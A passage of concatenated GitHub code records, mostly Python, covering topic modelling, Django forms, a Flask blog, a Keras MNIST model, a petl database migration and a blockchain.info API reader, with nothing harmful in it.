list_b, list_index = [], [], []\nfor year in range(START_YEAR, END_YEAR+1):\n    list_a.extend(a[year])\n    list_b.extend(b[year])\nfor i in list_b:\n    list_index.append(list_a.index(i))\nlist_index.sort(reverse=True)\nfor i in list_index:\n    del doc_list[i]\n\n# 8. 
Show the table\nprint(\"Creating DF\")\ndf_dominant_topic = format_topics_sentences(ldamodel, docmatrix, doc_list, LIMIT)\nif LIMIT is None:\n    df_dominant_topic['Document_No'] = relevant_index\nelse:\n    df_dominant_topic['Document_No'] = relevant_index[:LIMIT]\nprint(df_dominant_topic.head(10))\nsave_to_pickle(content=df_dominant_topic, file_path=DF_DOMINANT_TOPIC_PATH)\nprint(\"Open table in Excel\")\nxlwings.view(df_dominant_topic.head(100))\nprint(\"Finish reading topics.\")","repo_name":"gunardilin/NLP_StackOverflow","sub_path":"p_prepare_analysis_data_a.py","file_name":"p_prepare_analysis_data_a.py","file_ext":"py","file_size_in_byte":7098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41226626248","text":"# DJANGO DECLARATIONS\nfrom django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\n\n# APP DECLARATIONS\nimport app.models as am\n\n# DECLARING CLASSES\nclass RegisterForm(UserCreationForm):\n    email = forms.EmailField(required=True)\n\n    class Meta:\n        model = User\n        fields = (\"email\", \"password1\", \"password2\")\n\n    def save(self, commit=True):\n        user = super(RegisterForm, self).save(commit=False)\n        user.email = self.cleaned_data['email']\n        if commit:\n            user.save()\n        return user\n\n\nclass TaskForm(forms.ModelForm):\n\n    class Meta:\n        model = am.Task\n        fields = (\n            'id',\n            'version',\n            'task_name',\n            'task_description',\n            'task_type',\n            'task_end',\n            'user_profile',\n            'priority',\n            'status')\n\n    def __init__(self, *args, **kwargs):\n        super(TaskForm, self).__init__(*args, **kwargs)\n        for field_name, field in self.fields.items():\n            field.widget.attrs['class'] = 'form-control'\n        self.fields['version'].required = True\n        self.fields['task_name'].required = True\n        self.fields['task_description'].required = True\n        self.fields['task_type'].required = True\n        self.fields['task_end'].required = True\n        self.fields['user_profile'].required = True\n        self.fields['status'].required = True\n        self.fields['priority'].required = True\n\n\nclass VersionForm(forms.ModelForm):\n\n    class Meta:\n        model = am.Version\n        fields = (\"project\", \"version_name\", \"date_of_release\")\n\n    def __init__(self, *args, **kwargs):\n        super(VersionForm, self).__init__(*args, **kwargs)\n        for field_name, field in self.fields.items():\n            field.widget.attrs['class'] = 'form-control'\n\n\nclass ProjectForm(forms.ModelForm):\n\n    class Meta:\n        model = am.Project\n        fields = (\"company\", \"project_name\", \"project_description\")\n\n    def __init__(self, *args, **kwargs):\n        super(ProjectForm, self).__init__(*args, **kwargs)\n        for field_name, field in self.fields.items():\n            field.widget.attrs['class'] = 'form-control'","repo_name":"ajappdev/devocular","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39865456501","text":"from typing import List\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport tqdm\n\nclass HeapNode():\n    def __init__(self, value):\n        self.children: List[HeapNode] = []\n        self.equivalenceClass: List[int] = [value]\n    \n    def equal(self, otherNode):\n        self.equivalenceClass.extend(otherNode.equivalenceClass)\n        self.children.extend(otherNode.children)\n        return self\n\n    def greaterThan(self, otherNode):\n        self.children.append(otherNode)\n        return self\n\n    def lessThan(self, otherNode):\n        return otherNode.greaterThan(self)\n 
\n    def __str__(self) -> str:\n        childStrings = \", \".join(str(c) for c in self.children)\n        return f\"{self.equivalenceClass} => ({childStrings})\"\n\ndef doTrial(numDocuments: int):\n    round = 0\n    totalSteps = 0\n    documents = [HeapNode(i) for i in range(numDocuments)]\n    equivalenceClasses = []\n    while len(documents) > 0:\n        step = 0\n        currentRoundRoot = documents[0] \n        for i in range(1,len(documents)):\n            nextChoice = random.randint(-1,1)\n            # print(f\"ROUND {round} STEP {step}: {currentRoundRoot.equivalenceClass}, {documents[i].equivalenceClass}, CHOICE: {nextChoice}\")\n            if nextChoice == -1:\n                currentRoundRoot = currentRoundRoot.greaterThan(documents[i])\n            if nextChoice == 0:\n                currentRoundRoot = currentRoundRoot.equal(documents[i])\n            if nextChoice == 1:\n                currentRoundRoot = currentRoundRoot.lessThan(documents[i])\n            step += 1\n        documents = currentRoundRoot.children\n        equivalenceClasses.append(currentRoundRoot.equivalenceClass)\n\n        totalSteps += step\n        step = 0\n        round += 1\n\n    return totalSteps\n\n# --------------------------------------------------------------------------------------------------\n# SIMULATION\nNUM_TRIALS = 100\nresults = {}\nfor numDocuments in range(10,2000,50):\n    results[numDocuments] = []\nfor trialIndex in tqdm.tqdm(range(NUM_TRIALS), desc=\"TRIALS\"):\n    for numDocuments in results.keys():\n        totalSteps = doTrial(numDocuments)\n        results[numDocuments].append(totalSteps)\n\n# Aggregate all trial results\naggregatedResults = []\nfor numDocuments, trialResults in results.items():\n    aggregatedResults.append((numDocuments, np.average(trialResults), np.std(trialResults)))\naggregatedResults.sort(key=lambda x: x[0])\naggregatedResults = np.array(aggregatedResults).T\n# print(aggregatedResults)\n\n# Plot results of aggregation\nplt.figure(figsize=(10,8))\nplt.errorbar(x=aggregatedResults[0, :], y=aggregatedResults[1, :], yerr=aggregatedResults[2, :], fmt=\"o-\", capsize=2)\n\n# Annotation for our samples\nX_VAL = 1440\nY_VAL = 2160\nplt.vlines(x=X_VAL, ymin=0, ymax=Y_VAL, colors=\"r\")\nplt.hlines(y=Y_VAL, xmin=0, xmax=X_VAL, colors=\"r\")\nplt.annotate(f\"({X_VAL}, {Y_VAL})\", (X_VAL, Y_VAL), (X_VAL+150, Y_VAL-400), arrowprops={\"width\": 1.5, \"headwidth\": 7, \"color\":\"k\", \"shrink\": 0.1})\n\nplt.xlim(left=0)\nplt.ylim(bottom=0)\nplt.title(f\"Average Number of Steps Required to Judge Document Collections\\n(Random Judgement, {NUM_TRIALS} Trials)\")\nplt.xlabel(\"Number of Documents\")\nplt.ylabel(\"Number of Steps\")\nplt.show()\n","repo_name":"hmcalister/JUDGO-Python-Testing","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37847362079","text":"import sys; sys.stdin=open('2071.txt', 'r')\n\nT = int(input())\nfor tc in range(T):\n    N = list(map(int, input().split()))\n    sum = 0\n    for i in N:\n        sum += i\n    average = sum/10\n    print('#{} {}'.format(tc+1, round(average)))","repo_name":"nayulbak1/TIL","sub_path":"07_swea/2071.py","file_name":"2071.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39867490142","text":"\"\"\"\nThe usual approach\n\"\"\"\nwith open('some_file_1.txt', 'w') as opened_file:\n    opened_file.write('Hola!')\n\n\"\"\"\nThe alternative\n\"\"\"\nfile = open('some_file_2.txt', 'w')\ntry:\n    file.write('Hola!')\nfinally:\n    file.close()\n\n\"\"\"\nA custom implementation\n\"\"\"\n\n\nclass File(object):\n    def 
__init__(self, file_name, method):\n        self.file_obj = open(file_name, method)\n\n    def __enter__(self):\n        return self.file_obj\n\n    def __exit__(self, type, value, traceback):\n        self.file_obj.close()\n\n    # if the __exit__ method returns True, any exception raised inside the context manager is swallowed\n    # def __exit__(self, type, value, traceback):\n    #     print(\"Exception has been handled\")\n    #     self.file_obj.close()\n    #     return True\n\n\nwith File('demo.txt', 'w') as opened_file:\n    # opened_file.write('Hola!')\n    opened_file.ceva_ce_nu_este_definit('Hola!')  # calling an undefined attribute on purpose, to show __exit__ receiving the exception\n\n\nfrom contextlib import contextmanager\n\n\"\"\"\nhttps://docs.python.org/3/library/contextlib.html\n\"\"\"\n\n\n@contextmanager\ndef open_file_custom(name):\n    f = open(name, 'w')\n    try:\n        yield f\n    finally:\n        f.close()\n\n\nwith open_file_custom('some_file_custom.txt') as f:\n    f.write('hola!')","repo_name":"hypermad/grupa_3","sub_path":"Intalnirea_14/context_manager.py","file_name":"context_manager.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15223367340","text":"import sys\nread = sys.stdin.readline\n\nfor _ in range(int(read())):\n    cloth = dict()\n    case = 1\n    for i in range(int(read())):\n        name, kind = read().rstrip().split()\n        if kind in cloth.keys():\n            cloth[kind] += 1\n        else:\n            cloth[kind] = 1\n    for value in cloth.values():\n        case *= value + 1\n    print(case-1)","repo_name":"danny6883/algorithm","sub_path":"BOJ/boj9375.py","file_name":"boj9375.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35010533743","text":"from flask import Blueprint, render_template, url_for, redirect, abort\n\nfrom users.posts.form import PostForm\nfrom users.decorators import login_required\nfrom users.users.users import UserBlog\nfrom users.utils.generator.msg import Message\nfrom users.utils.generator.date_generator import time_now\nfrom users.comments.form import CommentForm\n\nposts_app = Blueprint('posts_app', __name__, url_prefix=\"/posts\")\n\n\n@posts_app.route('/new/<blog_id>', methods=['GET', 'POST'])\n@login_required\ndef new_post(blog_id):\n    \"\"\"Takes a blog id and creates a new post within that blog\"\"\"\n\n    form = PostForm()\n    edit_draft = False\n\n    if form.validate_on_submit():\n\n        child_blog = _get_blog(blog_id)\n        child_blog.Post.create_new_post(form.title.data, form.post.data)\n\n        Message.display_to_gui_screen(\"The post was created successfully\")\n        return redirect(url_for('posts_app.posts', blog_id=blog_id))\n\n    return render_template('posts/new_post.html', form=form, blog_id=blog_id, edit_post=False, edit_draft=edit_draft)\n\n\n@posts_app.route('/<blog_id>')\n@login_required\ndef posts(blog_id):\n    \"\"\"Takes a blog id and returns all posts associated with that blog\"\"\"\n\n    child_blog = _get_blog(blog_id)\n\n    assert child_blog or abort(404)\n    return render_template(\"posts/posts.html\", posts=child_blog.Post.get_all_posts(),\n                           blog_id=blog_id, blog_name=child_blog.blog_name)\n\n\n@posts_app.route('/edit/<blog_id>/<post_id>', methods=['GET', 'POST'])\n@login_required\ndef edit_post(blog_id, post_id):\n    \"\"\"Takes a blog id and a post id and lets the user edit that post\"\"\"\n\n    child_blog = _get_blog(blog_id)\n    edit_draft = False\n\n    assert child_blog or abort(404)\n\n    post = child_blog.Post.get_post_by_id(post_id)\n    form = PostForm(obj=post)\n\n    if form.validate_on_submit():\n\n        post_data = get_updated_data(form, post)\n\n        if post_data:\n            post.update_post(post_data)\n            Message.display_to_gui_screen(\"Your post 
has successfully been updated.\")\n        return redirect(url_for(\"posts_app.posts\", blog_id=blog_id))\n\n    return render_template('posts/new_post.html', form=form, blog_id=blog_id, post_id=post_id,\n                           edit_post=True, edit_draft=edit_draft)\n\n\n@posts_app.route('/<blog_id>/<post_id>')\n@login_required\ndef delete_post(blog_id, post_id):\n    \"\"\"Takes a blog id and a post id and deletes that post\"\"\"\n\n    child_blog = _get_blog(blog_id)\n    child_blog.Post.delete_post(post_id)\n\n    Message.display_to_gui_screen(\"The post has successfully been deleted\")\n    return redirect(url_for(\"posts_app.posts\", blog_id=blog_id))\n\n\n@posts_app.route(\"/mode/preview/<blog_id>\", methods=['GET', 'POST'])\n@login_required\ndef post_preview(blog_id):\n    \"\"\"Allows the user to preview a post before it is published\"\"\"\n\n    form = PostForm()\n\n    if form.validate_on_submit():\n        return render_template(\"posts/post_preview.html\", form=form, date=time_now())\n    return redirect(url_for(\"posts_app.new_post\", blog_id=blog_id))\n\n\n@posts_app.route(\"/permalink/<blog_id>/<post_id>\", methods=['GET', 'POST'])\ndef post_permalink(blog_id, post_id):\n    \"\"\"Displays a single post and handles its comments\"\"\"\n    form = CommentForm()\n\n    child_blog = _get_blog(blog_id)\n\n    post = child_blog.Post.get_post_by_id(post_id)\n\n    if form.validate_on_submit():\n        post.Comment.save_comment(comment=form.comment.data)\n        return redirect(url_for(\"posts_app.post_permalink\", blog_id=blog_id, post_id=post_id))\n\n    return render_template(\"posts/post_permalink.html\", form=form, post=post)\n\n\ndef _get_blog(blog_id):\n    \"\"\"Returns the blog that matches the given blog id\"\"\"\n    blog = UserBlog()\n    return blog.get_blog(blog_id)\n\n\ndef get_updated_data(form, post_obj):\n    \"\"\"get_updated_data(form_obj, post_obj) -> return dict\n\n    Checks if the user has updated their data. If the data has\n    been updated returns only the updated data otherwise returns\n    an empty dictionary.\n    \"\"\"\n\n    data = {}\n\n    if form.title.data != post_obj.title:\n        data.update({\"title\": form.title.data})\n    if form.post.data != post_obj.post:\n        data.update({\"post\": form.post.data})\n    return data","repo_name":"EgbieAndersonUku1/myBlog","sub_path":"src/users/posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36439711910","text":"import random, numpy, time, os\nfrom pathlib import Path\n\n# setting parameters\n\"\"\"\ncont = random.random()\nsize = random.random()\nspatialfreq = random.random() * numpy.pi\nornt = random.random() * pi\nphase = random.random()\n\"\"\"\n\ndef contgenerator():\n    randomcont = -2\n    while randomcont > 1.5 or randomcont < -1.5:\n        randomcont = random.lognormvariate(0, 1)\n    return randomcont\n    \ndef sizegenerator():\n    randomsize = random.lognormvariate(1, 1)\n    return randomsize\n    \ndef spatialfreqgenerator():\n    randomfreq = random.random() * numpy.pi * 2\n    return randomfreq\n\ndef orntgenerator():\n    randomornt = random.random() * numpy.pi * 2\n    return randomornt\n    \ndef phasegenerator():\n    randomphase = random.lognormvariate(0, 1)\n    return randomphase\n\ndef randomgenerator():\n    return contgenerator(), sizegenerator(), spatialfreqgenerator(), orntgenerator(), phasegenerator()\n    \n#assigning values\ncont, size, freq, ornt, phase = randomgenerator()\nprint(str(cont) + \", \" + str(size) + \", \" + str(freq) + \", \" + str(ornt) + \", \" + str(phase) + \", \") #print randomly generated parameters\n\n#making file\ndataPath='D:\\\\test\\\\'\ndate = (time.strftime(\"%Y-%m-%d\"))\ndirectory = dataPath+date\nif not os.path.isdir(directory):\n    print('path not exist')\n    
os.makedirs(directory)\nlogFilePath =dataPath+date+'\\\\'+Path(__file__).stem #filepath\ni = 0\nFileName = f\"{i:03}\"+'.txt'\nwhile os.path.exists(logFilePath+FileName):\n i = i+1\n FileName = f\"{i:03}\"+'.txt'\nprint(logFilePath+FileName) #new file name and location\n\n#logging\ntimestamp = (time.strftime(\"%M-%S\"))\nprint(timestamp)\nstimarray = numpy.array([cont, size, freq, ornt, phase])\nprint(stimarray)\nfmt = \"%1.3f\"\nnumpy.savetxt(logFilePath+FileName,stimarray,fmt=fmt,delimiter = ',',newline = '\\n')","repo_name":"schollben/Psychopy","sub_path":"Psychopy_Scripts_Active/randomgenerator/randomgenerator.py","file_name":"randomgenerator.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5745020526","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom typing import Dict, Any\n\nfrom onion_config import ConfigLoader\nfrom beans_logging import logger\n\nfrom src.core.constants import EnvEnum, ENV_PREFIX_DB\nfrom src.core.configs import ConfigSchema\n\n\ndef _pre_load_hook(config_data: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Pre-load hook to modify config data before loading and validation.\n\n Args:\n config_data (Dict[str, Any]): Pre-loaded config data.\n\n Returns:\n Dict[str, Any]: Modified config data.\n \"\"\"\n\n try:\n if \"ENV\" in os.environ:\n config_data[\"env\"] = os.getenv(\"ENV\")\n\n if (\"env\" in config_data) and (\n (config_data[\"env\"] == EnvEnum.STAGING)\n or (config_data[\"env\"] == EnvEnum.PRODUCTION)\n ):\n if f\"{ENV_PREFIX_DB}DSN_URL\" not in os.environ and (\n f\"{ENV_PREFIX_DB}HOST\" not in os.environ\n or f\"{ENV_PREFIX_DB}PORT\" not in os.environ\n or f\"{ENV_PREFIX_DB}USERNAME\" not in os.environ\n or f\"{ENV_PREFIX_DB}PASSWORD\" not in os.environ\n or f\"{ENV_PREFIX_DB}DATABASE\" not in os.environ\n ):\n raise KeyError(\n f\"Missing required '{ENV_PREFIX_DB}*' environment variables for staging/production environment!\"\n )\n except Exception:\n logger.error(f\"Error occured while pre-loading config!\")\n raise\n\n return config_data\n\n\nconfig: ConfigSchema\ntry:\n _config_loader = ConfigLoader(\n config_schema=ConfigSchema,\n pre_load_hook=_pre_load_hook,\n )\n # Main config object:\n config: ConfigSchema = _config_loader.load()\nexcept Exception:\n logger.exception(\"Failed to load config:\")\n exit(2)\n\n\n__all__ = [\"config\"]\n","repo_name":"bybatkhuu/rest.fastapi-orm-template","sub_path":"app/src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71075308587","text":"# input\n# number of minons (lines)\nn = int(input())\n# create minion class\nclass Minion:\n def __init__(self, min_val, max_val):\n self.min = min_val\n self.max = max_val\n# parse minions\nminions = []\nfor i in range(n):\n interval = input().split()\n interval = list(map(int, interval))\n minion = Minion(interval[0], interval[1])\n minions.append(minion)\n\n# sort minions\nminions.sort(key = lambda x: x.min)","repo_name":"bevvvvv/ExploringData","sub_path":"TriplebytePractice/minions.py","file_name":"minions.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70792549226","text":"import json\n\n\ndef preprocess(s: str) -> str:\n import re\n\n rubbish = re.compile(r\"!?<>\")\n cleared_s = rubbish.sub(\"\", s)\n cleared_s = 
re.sub(r\"[\\([{})\\]]\", \"\", cleared_s)\n return cleared_s.lower()\n\n\ndef parse_attributes(s: str) -> str:\n if s is not None:\n d = json.loads(s)\n res_string = []\n for key, values in d.items():\n res_string.append(key)\n res_string.append(values)\n res_string = \" \".join(res_string)\n return preprocess(res_string)\n return \"\"\n\n\ndef append_color_to_attrs(attr_dict, color_parsed: str) -> str:\n if attr_dict is not None:\n attr_dict = json.loads(attr_dict)\n if color_parsed is not None:\n attr_dict[\"Цвет\"] = color_parsed\n return json.dumps(dict(sorted(attr_dict.items(), key=lambda item: item[0])),\n ensure_ascii=False)\n return None\n","repo_name":"EgorSmi/matcher","sub_path":"matcher/utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41495187620","text":"from sklearn.model_selection import train_test_split\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\r\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\r\nfrom keras.models import model_from_json\r\nfrom keras.utils import np_utils\r\nfrom keras.preprocessing.image import img_to_array\r\nfrom PIL import Image\r\nfrom keras import backend as K\r\nimport numpy as np\r\nimport pandas as pd\r\nimport csv\r\nimport os\r\nimport theano\r\n\r\nK.set_image_dim_ordering('th'); print()\r\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\r\ntheano.config.optimizer = \"None\"\r\n\r\nx = [] #training data image info\r\ny = [] #corresponding labels\r\n\r\nw, h = 28, 28\r\n\r\nprint('Reading CSV training file...')\r\nwith open('input/train.csv', 'r') as csvfile:\r\n\treadCSV = csv.reader(csvfile, delimiter=',')\r\n\tfor row in readCSV:\r\n\t\tif (row[0] != 'label'):\r\n\t\t\tpixels = np.array(row[1:785]);\r\n\r\n\t\t\tdata = np.zeros((h, w, 3), dtype=np.uint8)\r\n\t\t\tfor i in range (0, (h*w)):\r\n\t\t\t\txPos = int(i/w)\r\n\t\t\t\tyPos = i - w*int(i/w)\r\n\t\t\t\tpixVal = int(pixels[i])\r\n\t\t\t\tdata[xPos, yPos] = [pixVal, pixVal, pixVal]\r\n\t\t\timg = Image.fromarray(data, 'RGB')\r\n\t\t\timg = img_to_array(img) / 255\r\n\t\t\timg = img.transpose(2, 0, 1)\r\n\t\t\timg = img.reshape(3, h, w)\r\n\r\n\r\n\t\t\tx.append(img)\r\n\t\t\ty.append(int(row[0]))\r\nprint('CSV training file read.')\r\n\r\nx = np.array(x)\r\ny = np.array(y)\r\n\r\nbatch_size = 32\r\nnb_classes = 10 #10 digits\r\nnb_epoch = 3\r\nnb_filters = 32\r\nnb_pool = 2\r\nnb_conv = 3\r\n\r\nuniques, id_train = np.unique(y, return_inverse=True)\r\ny_train = np_utils.to_categorical(id_train, nb_classes)\r\n\r\nprint('Creating model...')\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv, border_mode='same', input_shape=x.shape[1:]))\r\nmodel.add(Activation('relu'));\r\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv));\r\nmodel.add(Activation('relu'));\r\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)));\r\nmodel.add(Dropout(0.5));\r\nmodel.add(Flatten());\r\nmodel.add(Dense(128));\r\nmodel.add(Dropout(0.5));\r\nmodel.add(Dense(nb_classes));\r\nmodel.add(Activation('softmax'));\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])\r\nprint('Model created.')\r\n\r\nnb_epoch = 5;\r\nbatch_size = 5;\r\n\r\nprint('Fitting model...')\r\nmodel.fit(x, y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1)\r\nprint('Fitting complete.')\r\n\r\nprint('Saving model...')\r\nmodel_json = 
model.to_json()\r\nwith open(\"Model.json\", \"w\") as json_file:\r\n\tjson_file.write(model_json)\r\nmodel.save_weights(\"Model.h5\")\r\nprint('Model has been saved.')","repo_name":"wd2311/MNISTDataSet-MachineLearningWithCNNs-DigitRecognizer","sub_path":"MakeAndSaveModel1.py","file_name":"MakeAndSaveModel1.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23811232590","text":"from utils import get_connection, get_config\nimport petl as etl\n\ndef get_connection_to_dbs(source_config):\n '''\n Get the connection to the source and destination databases\n :param: configs to connect to source DB\n '''\n from_db_conn = get_connection(source_config['host'], source_config['dbname'],\n source_config['user'], source_config['pass'])\n config = get_config()\n to_db_conn = get_connection(config['host'], config['dbname'], config['user'], config['pass'])\n return from_db_conn, to_db_conn\n\ndef transfer_data(from_db_conn, to_db_conn):\n '''\n Transfer data from databases given cursor to execute queries to connected databases\n Limitations:\n 1. poc.address_id is currently marked as -1 since it was not provided in test data and is a FK non-null constraint\n 2. institution2poc table is not available in old schema\n 3. role table is already populated in bill.sql file so that table is skipped by this script\n 4. poc_poc_id is currently set to be poc_id since no relevant information is available about the column\n 5. project2moc_project.role_id column is not available in old schema and is a not null field in new schema\n so we default it to 1 for now.\n 6. project2moc_project.username is not available from old schema so currently set to empty\n 7. raw_item_ts.item_id has duplicates when imported from item_ts. 
So we currently filter out and insert only uniques.\n\n :param from_db_conn: source database connection\n :param to_db_conn: destination database connection\n '''\n\n # Emptying out tables with possible foreign key constraint issues\n fk_dep_tables = ['poc2project', 'poc2moc_project', 'poc', 'raw_item_ts', 'item', 'project', 'institution2moc_project' ]\n for table_name in fk_dep_tables:\n table = etl.fromdb(to_db_conn, \"select * from {} where 1=0\".format(table_name))\n etl.todb(table, to_db_conn, table_name)\n\n # Tables with no change in schema\n insert_as_tables = ['institution', 'address', 'item_type', 'item2item', 'catalog_item']\n for table_name in insert_as_tables:\n table = etl.fromdb(from_db_conn, \"select * from {}\".format(table_name))\n etl.todb(table, to_db_conn, table_name)\n\n # inserting dummy address for constraint matching\n dummy_address = [{'address_id': -1}]\n dummy_address_table = etl.fromdicts(dummy_address)\n etl.appenddb(dummy_address_table, to_db_conn, 'address')\n\n poc = etl.fromdb(from_db_conn, 'select * from poc')\n poc_transformed = etl.cutout(poc, 'domain_id', 'user_uid')\n poc_dummy_address = etl.replace(poc_transformed, 'address_id', None, -1)\n etl.todb(poc_dummy_address, to_db_conn, 'poc')\n\n project_names_table = etl.fromdb(from_db_conn, \"select distinct project_name from project\")\n moc_project_transformed = etl.addrownumbers(project_names_table)\n moc_project_transformed = etl.rename(moc_project_transformed, {'row': 'moc_project_id'})\n etl.todb(moc_project_transformed, to_db_conn, 'moc_project')\n\n domain = etl.fromdb(from_db_conn, \"select * from domain\")\n domain_table_transformed = etl.cutout(domain, 'domain_uid')\n domain_table_transformed = etl.rename(domain_table_transformed, {'domain_id': 'service_id', 'domain_name': 'service_name'})\n etl.todb(domain_table_transformed, to_db_conn, 'service')\n\n project = etl.fromdb(from_db_conn, \"select * from project\")\n moc_project = etl.fromdb(to_db_conn, \"select * from moc_project\")\n project_moc_project_joined = etl.join(project, moc_project, key='project_name')\n project_table_transformed = etl.cutout(project_moc_project_joined, 'project_name')\n project_table_transformed = etl.rename(project_table_transformed, {'domain_id': 'service_id', 'project_uid': 'project_uuid'})\n etl.todb(project_table_transformed, to_db_conn, 'project')\n\n institution2project = etl.fromdb(from_db_conn, \"Select * from institution2project\")\n project = etl.fromdb(to_db_conn, \"select project_id, moc_project_id from project\")\n inst2project_project_joined = etl.join(institution2project, project, key='project_id')\n inst2moc_project = etl.cutout(inst2project_project_joined, 'domain_id')\n etl.todb(inst2moc_project, to_db_conn, 'institution2moc_project')\n\n project2poc = etl.fromdb(from_db_conn, \"select * from project2poc\")\n project2poc_project_joined = etl.join(project2poc, project, key='project_id')\n poc2moc_project = etl.cutout(project2poc_project_joined, 'project_id', 'domain_id')\n poc2moc_project = etl.addfield(poc2moc_project, 'role_id', 1)\n poc2moc_project = etl.addfield(poc2moc_project, 'poc_poc_id', lambda rec: rec['poc_id'])\n etl.todb(poc2moc_project, to_db_conn, 'poc2moc_project')\n\n poc2project = etl.cutout(project2poc, 'domain_id')\n poc2project = etl.addfield(poc2project, 'role_id', 1)\n poc2project = etl.addfield(poc2project, 'username', '')\n etl.todb(poc2project,to_db_conn, 'poc2project')\n\n item = etl.fromdb(from_db_conn, \"select * from item\")\n item_transformed = etl.cutout(item, 
'domain_id')\n    etl.todb(item_transformed, to_db_conn, 'item')\n\n    raw_item_ts_unique = etl.fromdb(from_db_conn, \"WITH summary AS ( SELECT its.item_id, its.start_ts, its.end_ts, its.state, its.catalog_item_id, ROW_NUMBER() OVER(PARTITION BY its.item_id) AS rk FROM ITEM_TS its) SELECT s.* FROM summary s WHERE s.rk = 1\")\n    raw_item_ts_unique = etl.cutout(raw_item_ts_unique, 'rk')\n    etl.todb(raw_item_ts_unique, to_db_conn, 'raw_item_ts')\n\n\nif __name__ == '__main__':\n\n    # The source DB is the database to migrate from; it is based on the old schema model.\n    # The data in the source_db will be migrated to the moc_reporting DB. Provide the source_db configs below.\n    source_db_config = {\"dbname\":\"\", \"host\":\"\", \"user\": \"\", \"pass\": \"\"}\n    from_db, to_db = get_connection_to_dbs(source_db_config)\n    transfer_data(from_db, to_db)\n","repo_name":"kevinliang43/MOC_Reporting","sub_path":"data_migrator.py","file_name":"data_migrator.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2317457500","text":"# 임규연 (lky473736)\n\n# Type conversion: divided into explicit and implicit\n# Explicit: the type is stated directly, as in str = int(str) (type casting)\n# Implicit: Python recognizes the type on its own\n\np = 123.1234567\np = round(p, 2)  # the round function can format a float to n decimal places (similar to %.nf)\nprint(p)\n\n","repo_name":"lky473736/learningpython","sub_path":"B0321-3.py","file_name":"B0321-3.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71551197549","text":"import requests, json\nimport pandas as pd\nimport numpy as np\nimport networkx as nx\nfrom networkx.drawing.nx_agraph import write_dot, graphviz_layout\nimport matplotlib.pyplot as plt\nimport datetime, time\nimport openpyxl as xl\nimport csv\n\nclass BlockChain:\n\n    def __init__(self):\n        self.header = header\n        # inputs=self.txData.get('inputs', [])\n        # if inputs: #None, []\n        #     if isinstance(inputs, list):\n\n    def initAddressFromExcel(self, address):\n        url = requests.get(\"https://blockchain.info/rawaddr/\" + address, headers=self.header)\n        print(\"initAddress status code : \" + str(url.status_code))\n        text = url.text\n        time.sleep(5)\n        self.addrData = json.loads(text)\n\n    def getAddrType(self):\n        if self.addrData['address'][0] == '1':\n            return \"P2PKH\"\n        elif self.addrData['address'][0] == '3':\n            return \"P2SH\"\n        else:\n            return \"Bech32\"\n\n        return self.addrData['address']\n\n    def getTxHashList(self):\n        txList = []\n        tx_n = len(self.addrData['txs'])\n        for txNum in range (0, tx_n):\n            txList.append(self.addrData['txs'][txNum]['hash'])\n        return txList\n\n    def initHashInfo(self, txHash):\n        url = requests.get(\"https://blockchain.info/rawtx/\" + txHash, headers=self.header)\n        print(\"initHashInfo status code : \" + str(url.status_code))\n        text = url.text\n        time.sleep(5)\n        self.txData = json.loads(text)\n        # with open('file_name.json', 'w') as f:\n        #     json.dump(self.txData, f, indent=4)\n\n    def initAddress(self, address):\n        url = requests.get(\"https://blockchain.info/rawaddr/\" + address, headers=self.header)\n        print(\"initAddress status code : \" + str(url.status_code))\n        text = url.text\n        time.sleep(5)\n        self.addrData = json.loads(text)\n\n    def isMultipleInput(self):\n        if len(self.txData['inputs']) >= 2:\n            return True #\n        else: # Single Input\n            return False\n\n    def isSingleOutput(self):\n        if len(self.txData['out']) == 1:\n            return True #\n        else:\n            return False\n\n    def isMultiOutput(self):\n
